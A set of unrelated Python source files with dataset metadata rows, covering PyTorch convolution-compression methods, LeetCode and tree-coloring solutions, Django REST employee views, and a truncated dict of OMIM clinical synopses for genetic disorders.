    def falcon(self, rank=1, init=True, bn=False, relu=False):
        """
        Replace standard convolution by FALCON
        :param rank: rank of EHP
        :param init: whether initialize FALCON with EHP decomposition tensors
        :param bn: whether add batch normalization after FALCON
        :param relu: whether add ReLU function after FALCON
        """
        print('********** Compressing...... **********')
        # Stages 1..4 are the residual stages; the stem ([0]) is untouched.
        for i in range(1, 5):
            for j in range(len(self.features[i])):
                if isinstance(self.features[i][j].conv1, nn.Conv2d):
                    print(self.features[i][j].conv1)
                    compress = EHPdecompose(self.features[i][j].conv1, rank, init, bn=bn, relu=relu)
                    self.features[i][j].conv1 = compress
                if isinstance(self.features[i][j].conv2, nn.Conv2d):
                    print(self.features[i][j].conv2)
                    compress = EHPdecompose(self.features[i][j].conv2, rank, init, bn=bn, relu=relu)
                    self.features[i][j].conv2 = compress
                # Re-create the BatchNorms on the same device; note this
                # resets their parameters and running statistics.
                if isinstance(self.features[i][j].bn1, nn.BatchNorm2d):
                    device = self.features[i][j].bn1.weight.device
                    self.features[i][j].bn1 = nn.BatchNorm2d(self.features[i][j].bn1.num_features).to(device)
                if isinstance(self.features[i][j].bn2, nn.BatchNorm2d):
                    device = self.features[i][j].bn2.weight.device
                    self.features[i][j].bn2 = nn.BatchNorm2d(self.features[i][j].bn2.num_features).to(device)
    def stconv_branch(self, alpha=1):
        """
        Replace standard convolution by StConvBranch
        :param alpha: width multiplier
        """
        # Rebuild the stem conv/bn with an alpha-widened output.
        self.features[0][0] = nn.Conv2d(3, int(self.features[0][0].out_channels * alpha),
                                        kernel_size=self.features[0][0].kernel_size,
                                        stride=self.features[0][0].stride,
                                        padding=self.features[0][0].padding,
                                        bias=False)
        self.features[0][1] = nn.BatchNorm2d(self.features[0][0].out_channels)
        for i in range(1, 5):
            for j in range(len(self.features[i])):
                if isinstance(self.features[i][j].conv1, nn.Conv2d):
                    compress = StConv_branch(int(self.features[i][j].conv1.in_channels * alpha),
                                             int(self.features[i][j].conv1.out_channels * alpha),
                                             stride=self.features[i][j].conv1.stride[0])
                    self.features[i][j].conv1 = compress
                if isinstance(self.features[i][j].conv2, nn.Conv2d):
                    compress = StConv_branch(int(self.features[i][j].conv2.in_channels * alpha),
                                             int(self.features[i][j].conv2.out_channels * alpha),
                                             stride=self.features[i][j].conv2.stride[0])
                    self.features[i][j].conv2 = compress
        # Flatten the residual stages into a single sequence of
        # BasicBlock_StConvBranch modules, widening downsample paths too.
        layers = []
        layers.append(self.features[0])
        for i in range(1, 5):
            for j in range(len(self.features[i])):
                if self.features[i][j].downsample is not None:
                    # NOTE(review): bias= is handed the original conv's bias
                    # attribute (a tensor or None) where nn.Conv2d expects a
                    # bool -- confirm this is intended.
                    self.features[i][j].downsample[0] = nn.Conv2d(int(self.features[i][j].downsample[0].in_channels * alpha),
                                                                  int(self.features[i][j].downsample[0].out_channels * alpha),
                                                                  kernel_size=self.features[i][j].downsample[0].kernel_size,
                                                                  stride=self.features[i][j].downsample[0].stride,
                                                                  padding=self.features[i][j].downsample[0].padding,
                                                                  bias=self.features[i][j].downsample[0].bias)
                    self.features[i][j].downsample[1] = nn.BatchNorm2d(int(self.features[i][j].downsample[1].num_features * alpha))
                layers.append(BasicBlock_StConvBranch(self.features[i][j].conv1, self.features[i][j].conv2, self.features[i][j].downsample))
        layers.append(self.features[5])
        self.features = nn.Sequential(*layers)
        self.classifier = nn.Linear(int(self.classifier.in_features * alpha), 1000, bias=True)
    def falcon_branch(self, init=True):
        """
        Replace standard convolution in stconv_branch by falcon
        :param init: whether initialize falcon
        """
        for i in range(len(self.features)):
            if isinstance(self.features[i], BasicBlock_StConvBranch):
                if isinstance(self.features[i].conv1, StConv_branch):
                    self.features[i].conv1.falcon(init=init)
                if isinstance(self.features[i].conv2, StConv_branch):
                    self.features[i].conv2.falcon(init=init)
        # for i in range(len(self.features.module)):
        #     if isinstance(self.features.module[i], StConv_branch):
        #         self.features.module[i].falcon(init=init)
class VGGModel_imagenet_inf(nn.Module):
    """Inference-time feature extractor: exposes only the convolutional
    feature stack of a VGG-style model, dropping the classifier head.
    """
    def __init__(self, model):
        """Keep a reference to the model's feature stack.

        :param model: a model exposing a `features` module
        """
        super(VGGModel_imagenet_inf, self).__init__()
        self.features = model.features
    def forward(self, x):
        """Run forward propagation through the feature stack only."""
        return self.features(x)
class ResNetModel_imagenet_inf(nn.Module):
    """Inference-time feature extractor for a re-organized ResNet model.

    Keeps every child of `model.features` except the last one (the
    average-pooling stage), so forward() yields spatial feature maps.
    """
    def __init__(self, model):
        """Wrap all but the final child of the model's feature stack.

        :param model: a model exposing a `features` module container
        """
        super(ResNetModel_imagenet_inf, self).__init__()
        children = list(model.features.children())
        self.features = nn.Sequential(*children[:-1])
    def forward(self, x):
        """Run forward propagation through the trimmed feature stack."""
        return self.features(x)
| [
"hyundonglee@Hyuns-MacBook-Pro.local"
] | hyundonglee@Hyuns-MacBook-Pro.local |
0bfe22a225fc631fd9b82eb32331f6e0fd8df359 | 395ec9e51411736f27682c5c6dcb272167c75bf4 | /leetcode/daily challenges/2020-11/17-mirror-reflection.py | 658d86c3baa328226429d53af97bed677216c828 | [] | no_license | Nayald/algorithm-portfolio | 84242483273595912560128169fd67d1ef4a8871 | f6f7b548b29abe53b88a7396296d7edc932450cc | refs/heads/master | 2023-05-01T20:24:04.349022 | 2021-05-15T16:16:54 | 2021-05-15T16:16:54 | 298,006,042 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 312 | py | class Solution:
def mirrorReflection(self, p: int, q: int) -> int:
h, r = q, 1
while h % p != 0:
h += q
r ^= 1
if r == 0:
return 2
elif (h // p) % 2 == 1:
return 1
else:
return 0
| [
"xavier.marchal.2@gmail.com"
] | xavier.marchal.2@gmail.com |
9f111dee20b77dd96f8990ce0d94617eada8184b | 471c6751dd08fefa0d647785ac2227b9c907f0ee | /company/views.py | 5b4262f8e4e988774cf746f490d378e4018ef38e | [] | no_license | kamlesh-kp/taskmanagement | e10634913682d3652cf63d4254a1cc072594ea75 | 12f8046cff73af33f4f3f1827eeeafa19b9a13f4 | refs/heads/master | 2022-05-01T15:09:16.854427 | 2019-09-23T16:17:10 | 2019-09-23T16:17:10 | 204,920,512 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,303 | py | from .models import Employee
from .serializers import EmployeeSerializer
from rest_framework import generics
from rest_framework import mixins
from rest_framework.permissions import IsAuthenticated
class EmployeeList(mixins.ListModelMixin,
                   mixins.CreateModelMixin,
                   mixins.RetrieveModelMixin,
                   generics.GenericAPIView):
    """Collection endpoint for Employee records.

    GET returns the serialized list of all employees; POST creates a new
    employee from the request payload.
    """
    queryset = Employee.objects.all()
    serializer_class = EmployeeSerializer

    def get(self, request, *args, **kwargs):
        """Return the full employee collection."""
        return self.list(request, *args, **kwargs)

    def post(self, request, *args, **kwargs):
        """Create a new employee record."""
        return self.create(request, *args, **kwargs)
class EmployeeDetail(
        mixins.RetrieveModelMixin,
        mixins.UpdateModelMixin,
        mixins.DestroyModelMixin,
        generics.GenericAPIView):
    """Single-record endpoint: retrieve, replace, or delete one Employee
    identified by the URL keyword arguments (primary key).
    """
    queryset = Employee.objects.all()
    serializer_class = EmployeeSerializer

    def get(self, request, *args, **kwargs):
        """Return the serialized employee for the requested pk."""
        # Bug fix: removed leftover debug print of the request arguments.
        return self.retrieve(request, *args, **kwargs)

    def put(self, request, *args, **kwargs):
        """Replace the employee with the request payload."""
        return self.update(request, *args, **kwargs)

    def delete(self, request, *args, **kwargs):
        """Delete the employee."""
        return self.destroy(request, *args, **kwargs)
| [
"parmarkamleshk@gmail.copm"
] | parmarkamleshk@gmail.copm |
55e79bd191ffe9687b9c3a799bef14b5e3c01b61 | 999f3f3da1cb70cb5872f99a09d65d7c4df71cf7 | /src/data/290.py | fb2d7139623c1498c3f0b53f9cf6d659f8606b2a | [
"MIT"
] | permissive | NULLCT/LOMC | 0f0d1f01cce1d5633e239d411565ac7f0c687955 | 79a16474a8f21310e0fb47e536d527dd5dc6d655 | refs/heads/main | 2023-07-27T17:03:46.703022 | 2021-09-04T08:58:45 | 2021-09-04T08:58:45 | 396,290,713 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 560 | py | import queue
from collections import deque


def bfs_two_coloring(node_count, adjacency):
    """Two-color a connected tree by BFS from node 0.

    color[v] is the parity (0 or 1) of the depth of v, so two nodes share
    a color exactly when the path between them has even length.

    Improvements over the original script: collections.deque replaces the
    heavyweight thread-safe queue.Queue, the builtin name `next` is no
    longer shadowed, and the logic is factored out of the I/O so it can be
    tested.

    :param node_count: number of nodes (labeled 0..node_count-1)
    :param adjacency: adjacency lists of the tree
    :return: list of 0/1 colors indexed by node
    """
    color = [-1] * node_count
    color[0] = 0
    frontier = deque([0])
    while frontier:
        cur = frontier.popleft()
        for neighbor in adjacency[cur]:
            if color[neighbor] == -1:
                color[neighbor] = color[cur] ^ 1
                frontier.append(neighbor)
    return color


def main():
    """Read the tree and queries from stdin; for each query print "Town"
    when the two nodes are an even distance apart, else "Road"."""
    n, q = map(int, input().split())
    adjacency = [[] for _ in range(n)]
    for _ in range(n - 1):
        a, b = map(int, input().split())
        adjacency[a - 1].append(b - 1)
        adjacency[b - 1].append(a - 1)
    color = bfs_two_coloring(n, adjacency)
    for _ in range(q):
        c, d = map(int, input().split())
        print("Town" if color[c - 1] == color[d - 1] else "Road")


if __name__ == "__main__":
    main()
"cockatiel.u10@gmail.com"
] | cockatiel.u10@gmail.com |
3f5bc7b1ef00bee3974844969adabaab86ab5955 | c913c952cf4019d67f02bf1971917116da375c81 | /Data/OMIMresults/omimResults5140to5160.py | 5eaf8c690174d02ca388d68de1b0424629b3b304 | [] | no_license | jiangchb/OMIMscraping | 57afa5b2f8b7ca975e7459814e0410a872f71990 | 27d4ac8faea526b1c70937317caec064bed00a0a | refs/heads/master | 2022-03-14T21:35:56.102665 | 2019-11-22T15:48:48 | 2019-11-22T15:48:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 113,044 | py | omim = {'omim': {
'version': '1.0',
'searchResponse': {
'search': '*',
'expandedSearch': '*:*',
'parsedSearch': '+*:* ()',
'searchSuggestion': None,
'searchSpelling': None,
'filter': '',
'expandedFilter': None,
'fields': '',
'searchReport': None,
'totalResults': 7368,
'startIndex': 5140,
'endIndex': 5159,
'sort': '',
'operator': '',
'searchTime': 2.0,
'clinicalSynopsisList': [
{'clinicalSynopsis': {
'mimNumber': 617049,
'prefix': '#',
'preferredTitle': 'CHOLESTASIS, PROGRESSIVE FAMILIAL INTRAHEPATIC, 5; PFIC5',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'growthOther': 'Failure to thrive {SNOMEDCT:54840006,433476000,432788009} {ICD10CM:R62.51} {ICD9CM:783.41} {UMLS C2315100,C0015544,C3887638 HP:0001508} {HPO HP:0001508 C0231246,C2315100}',
'abdomenLiver': '''Liver failure {SNOMEDCT:59927004} {ICD10CM:K72.9} {UMLS C0085605,C1306571 HP:0001399} {HPO HP:0001399 C0085605};\nDuctal reaction seen on liver biopsy {UMLS C4314030};\nIntralobular cholestasis {UMLS C4314029};\nDiffuse giant cell transformation {UMLS C4314028};\nBallooning of hepatocytes {UMLS C3276178};\nFibrosis {SNOMEDCT:263756000,112674009} {UMLS C0016059,C4285457};\nCirrhosis {SNOMEDCT:19943007} {ICD10CM:K74.60} {UMLS C1623038,C0023890 HP:0001394} {HPO HP:0001394 C0023890};\nUndetectable BSEP expression in bile canaliculi {UMLS C4314027}''',
'skinNailsHairSkin': 'Jaundice {SNOMEDCT:18165001} {ICD10CM:R17} {UMLS C0022346,C2203646,C2010848 HP:0000952} {HPO HP:0000952 C0022346}',
'hematology': '''Vitamin K-independent coagulopathy {UMLS C4314025};\nIncreased INR {SNOMEDCT:313341008} {UMLS C0853225} {HPO HP:0008151 C0151872};\nProlonged prothrombin time {SNOMEDCT:409674002} {UMLS C0151872 HP:0008151} {HPO HP:0008151 C0151872};\nDecreased levels of factor V and VII {UMLS C4314024}''',
'prenatalManifestationsAmnioticFluid': 'Hydrops (1 patient) {UMLS C4314031} {HPO HP:0000969 C0013604}',
'laboratoryAbnormalities': '''Abnormal liver enzymes {SNOMEDCT:166643006} {UMLS C0438237 HP:0002910} {HPO HP:0002910 C0086565,C0151766,C0235996,C0438237,C0438717,C0877359,C1842003,C1848701};\nGGT is not increased {UMLS C4314026};\nIncreased alpha-fetoprotein {UMLS C0235971 HP:0006254};\nHypoglycemia {SNOMEDCT:271327008,302866003,237630007} {ICD10CM:E16.2} {ICD9CM:251.2} {UMLS C4553659,C0020615 HP:0001943} {HPO HP:0001943 C0020615};\nHyperammonemia {SNOMEDCT:9360008} {ICD10CM:E72.20} {UMLS C0220994 HP:0001987} {HPO HP:0001987 C0220994}''',
'miscellaneous': '''Onset at birth or in the neonatal period {UMLS C4314022};\nRapid progression {UMLS C1838681 HP:0003678} {HPO HP:0003678 C1838681,C1850776};\nFatal unless liver transplant is performed {UMLS C4314021};\nTwo unrelated families have been reported (last curated July 2016) {UMLS C4314881}''',
'molecularBasis': 'Caused by mutation in the nuclear receptor subfamily 1, group H, member 4 gene (NR1H4, {603826.0001})',
'inheritanceExists': True,
'growthExists': True,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': True,
'headAndNeckExists': False,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': True,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': True,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': True,
'skinNailsHairSkinExists': True,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': False,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': True,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': True,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': True,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': True,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 617050,
'prefix': '#',
'preferredTitle': 'HERMANSKY-PUDLAK SYNDROME 10; HPS10',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'headAndNeckHead': 'Microcephaly {SNOMEDCT:1829003} {ICD10CM:Q02} {ICD9CM:742.1} {UMLS C4551563,C0025958 HP:0000252} {HPO HP:0000252 C0424688} {EOM ID:8ae2118220c1308f IMG:Microcephaly-small.jpg}',
'headAndNeckFace': '''Flat philtrum {UMLS C1142533 HP:0000319} {HPO HP:0000319 C1142533} {EOM ID:3abca500a8f1872a IMG:Philtrum,Smooth-small.jpg};\nRetrognathia {SNOMEDCT:109515000} {UMLS C0035353,C3494422 HP:0000278} {HPO HP:0000278 C3494422} {EOM ID:588f04d3f1b40b25 IMG:Retrognathia-small.jpg}''',
'headAndNeckEars': '''Low-set ears {SNOMEDCT:95515009} {ICD10CM:Q17.4} {UMLS C0239234 HP:0000369} {HPO HP:0000369 C0239234};\nLarge ears {SNOMEDCT:275480001} {UMLS C0554972 HP:0000400} {HPO HP:0000400 C0152421,C0554972,C1835581,C1848570,C1850189,C1855062,C1860838};\nDecreased brainstem-evoked auditory potentials {UMLS C4314019};\nReduced otoacoustic potentials {UMLS C4314018}''',
'headAndNeckEyes': '''Hypotelorism {SNOMEDCT:44593008} {UMLS C0424711 HP:0000601} {HPO HP:0000601 C0424711} {EOM ID:5bfbc4ab8a8af765 IMG:Eyes,Closely_Spaced-small.jpg};\nNystagmus {SNOMEDCT:563001} {ICD10CM:H55.0,H55.00} {ICD9CM:379.50} {UMLS C1963184,C4554036,C0028738 HP:0000639} {HPO HP:0000639 C0028738};\nOcular albinism {SNOMEDCT:26399002} {ICD10CM:E70.319,E70.31} {UMLS C0078917 HP:0001107} {HPO HP:0001107 C0078917};\nLack of ocular fixation {UMLS C4314017}''',
'respiratory': 'Recurrent respiratory infections {UMLS C3806482 HP:0002205} {HPO HP:0002205 C3806482}',
'respiratoryLung': 'Interstitial lung disease {SNOMEDCT:233703007} {ICD10CM:J84.9} {UMLS C0206062 HP:0006530} {HPO HP:0006530 C0206062}',
'abdomenLiver': 'Hepatomegaly {SNOMEDCT:80515008} {ICD10CM:R16.0} {ICD9CM:789.1} {UMLS C0019209 HP:0002240} {HPO HP:0002240 C0019209}',
'abdomenSpleen': 'Splenomegaly {SNOMEDCT:16294009} {ICD10CM:R16.1} {ICD9CM:789.2} {UMLS C0038002 HP:0001744} {HPO HP:0001744 C0038002}',
'abdomenGastrointestinal': 'Feeding difficulties {SNOMEDCT:78164000} {ICD10CM:R63.3} {UMLS C0232466 HP:0011968} {HPO HP:0011968 C0232466}',
'skeletalPelvis': 'Flat acetabulae {UMLS C1865196}',
'skinNailsHairSkin': 'Cutaneous albinism {SNOMEDCT:718122005,6479008} {ICD10CM:E70.39} {UMLS C0080024 HP:0007544,HP:0007443}',
'skinNailsHairHair': 'Poorly pigmented hair {UMLS C3281294}',
'muscleSoftTissue': 'Hypotonia {SNOMEDCT:398152000,398151007} {UMLS C0026827,C1858120 HP:0001290,HP:0001252} {HPO HP:0001290 C1858120}',
'neurologicCentralNervousSystem': '''Lack of developmental progress {UMLS C4314020};\nSeizures, refractory {UMLS C2676167};\nGeneralized tonic-clonic seizures {SNOMEDCT:54200006} {ICD10CM:G40.4} {UMLS C0494475 HP:0002069} {HPO HP:0002069 C0494475};\nMyoclonic seizures {SNOMEDCT:37356005} {UMLS C4317123,C0014550 HP:0002123} {HPO HP:0002123 C0014550,C0751778,C4021759};\nTruncal hypotonia {UMLS C1853743 HP:0008936} {HPO HP:0008936 C1853743};\nLittle spontaneous movement {UMLS C3280662};\nDystonia {SNOMEDCT:15802004} {ICD10CM:G24,G24.9} {UMLS C0393593,C0013421 HP:0001332} {HPO HP:0001332 C0013421,C4020871};\nAbnormal EEG {SNOMEDCT:274521009} {ICD10CM:R94.01} {UMLS C0151611 HP:0002353} {HPO HP:0002353 C0151611};\nFrontal lobe atrophy {UMLS C3279888};\nCerebral atrophy {SNOMEDCT:278849000} {UMLS C0235946 HP:0002059} {HPO HP:0002059 C0154671,C0235946,C4020860};\nDelayed myelination {SNOMEDCT:135810007} {UMLS C1277241 HP:0012448} {HPO HP:0012448 C1277241}''',
'immunology': '''Immunodeficiency {SNOMEDCT:234532001} {ICD10CM:D84.9} {ICD9CM:279.3} {UMLS C0021051,C4284394 HP:0002721} {HPO HP:0002721 C0021051};\nNeutropenia {SNOMEDCT:303011007,165517008,84828003} {ICD10CM:D70,D70.9,D72.819} {ICD9CM:288.50,288.0,288.00} {UMLS C0027947,C0023530,C0853697 HP:0001882,HP:0001875} {HPO HP:0001875 C0853697};\nIncreased IgE {UMLS C0236175 HP:0003212};\nImpaired NK and T-cell degranulation {UMLS C4314016};\nBone marrow shows hypersegmented neutrophils {UMLS C4314015}''',
'miscellaneous': '''Onset in infancy {UMLS C1848924 HP:0003593} {HPO HP:0003593 C1848924};\nOne patient born of consanguineous Turkish parents has been reported (last curated July 2016) {UMLS C4314013}''',
'molecularBasis': 'Caused by mutation in the adaptor-related protein complex 3, delta-1 subunit gene (AP3D1, {607246.0001})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': True,
'headAndNeckHeadExists': True,
'headAndNeckFaceExists': True,
'headAndNeckEarsExists': True,
'headAndNeckEyesExists': True,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': True,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': True,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': True,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': True,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': True,
'abdomenGastrointestinalExists': True,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': True,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': True,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': True,
'skinNailsHairSkinExists': True,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': True,
'muscleSoftTissueExists': True,
'neurologicExists': True,
'neurologicCentralNervousSystemExists': True,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': True,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 617004,
'prefix': '#',
'preferredTitle': 'POLYCYSTIC LIVER DISEASE 2 WITH OR WITHOUT KIDNEY CYSTS; PCLD2',
'inheritance': 'Autosomal dominant {SNOMEDCT:263681008} {UMLS C0443147 HP:0000006} {HPO HP:0000006 C0443147}',
'abdomenLiver': '''Liver cysts {SNOMEDCT:85057007} {UMLS C0267834 HP:0001407} {HPO HP:0001407 C0267834};\nHepatomegaly {SNOMEDCT:80515008} {ICD10CM:R16.0} {ICD9CM:789.1} {UMLS C0019209 HP:0002240} {HPO HP:0002240 C0019209}''',
'genitourinaryKidneys': 'Renal cysts, few (in some patients) {UMLS C4692536}',
'miscellaneous': '''Adult onset {UMLS C1853562 HP:0003581} {HPO HP:0003581 C1853562};\nKidney cysts are usually incidental findings and do not cause significant renal disease {UMLS C4693252}''',
'molecularBasis': 'Caused by mutation in the gene encoding the human homolog of S. cerevisiae Sec63 (SEC63, {608648.0001})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': False,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': True,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': True,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': True,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': True,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': False,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 617051,
'prefix': '#',
'preferredTitle': 'MENTAL RETARDATION, AUTOSOMAL RECESSIVE 55; MRT55',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'headAndNeckHead': 'Microcephaly, borderline (-2.1 to -3.3 SD) {UMLS C4314010}',
'headAndNeckFace': 'Coarse facies {UMLS C1845847 HP:0000280} {HPO HP:0000280 C1845847,C4072825}',
'headAndNeckEyes': '''Strabismus {SNOMEDCT:22066006,128602000} {ICD10CM:H50.40,H50.9} {ICD9CM:378.30} {UMLS C2020541,C1423541,C0038379 HP:0032012,HP:0000486} {HPO HP:0000486 C0038379};\nGray sclerae {UMLS C4314009}''',
'skinNailsHairSkin': 'Mongolian spots {SNOMEDCT:40467008} {UMLS C0265985 HP:0100814,HP:0011369}',
'muscleSoftTissue': 'Hypotonia {SNOMEDCT:398152000,398151007} {UMLS C0026827,C1858120 HP:0001290,HP:0001252} {HPO HP:0001290 C1858120}',
'neurologicCentralNervousSystem': '''Global developmental delay {SNOMEDCT:224958001} {ICD10CM:F88} {UMLS C0557874 HP:0001263} {HPO HP:0001263 C0557874,C1864897,C4020875};\nMental retardation, profound {SNOMEDCT:31216003} {ICD10CM:F73} {UMLS C0020796 HP:0002187} {HPO HP:0002187 C0020796,C3161330};\nSeizures, well-controlled (in 1 patient) {UMLS C4314012};\nVentriculomegaly {SNOMEDCT:413808003} {UMLS C1531647,C3278923 HP:0002119} {HPO HP:0002119 C3278923};\nCerebral atrophy {SNOMEDCT:278849000} {UMLS C0235946 HP:0002059} {HPO HP:0002059 C0154671,C0235946,C4020860};\nArachnoid cysts {SNOMEDCT:33595009} {ICD10CM:G93.0} {UMLS C0078981 HP:0100702} {HPO HP:0100702 C0078981};\nDysgenesis of the corpus callosum {UMLS C0431369 HP:0006989};\nT2-weighted signal abnormalities in the subcortical white matter {UMLS C4314011}''',
'miscellaneous': '''Onset in infancy {UMLS C1848924 HP:0003593} {HPO HP:0003593 C1848924};\nOne consanguineous Saudi family has been reported (last curated July 2016) {UMLS C4314007}''',
'molecularBasis': 'Caused by mutation in the pseudouridylate synthase 3 gene (PUS3, {616283.0001})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': True,
'headAndNeckHeadExists': True,
'headAndNeckFaceExists': True,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': True,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
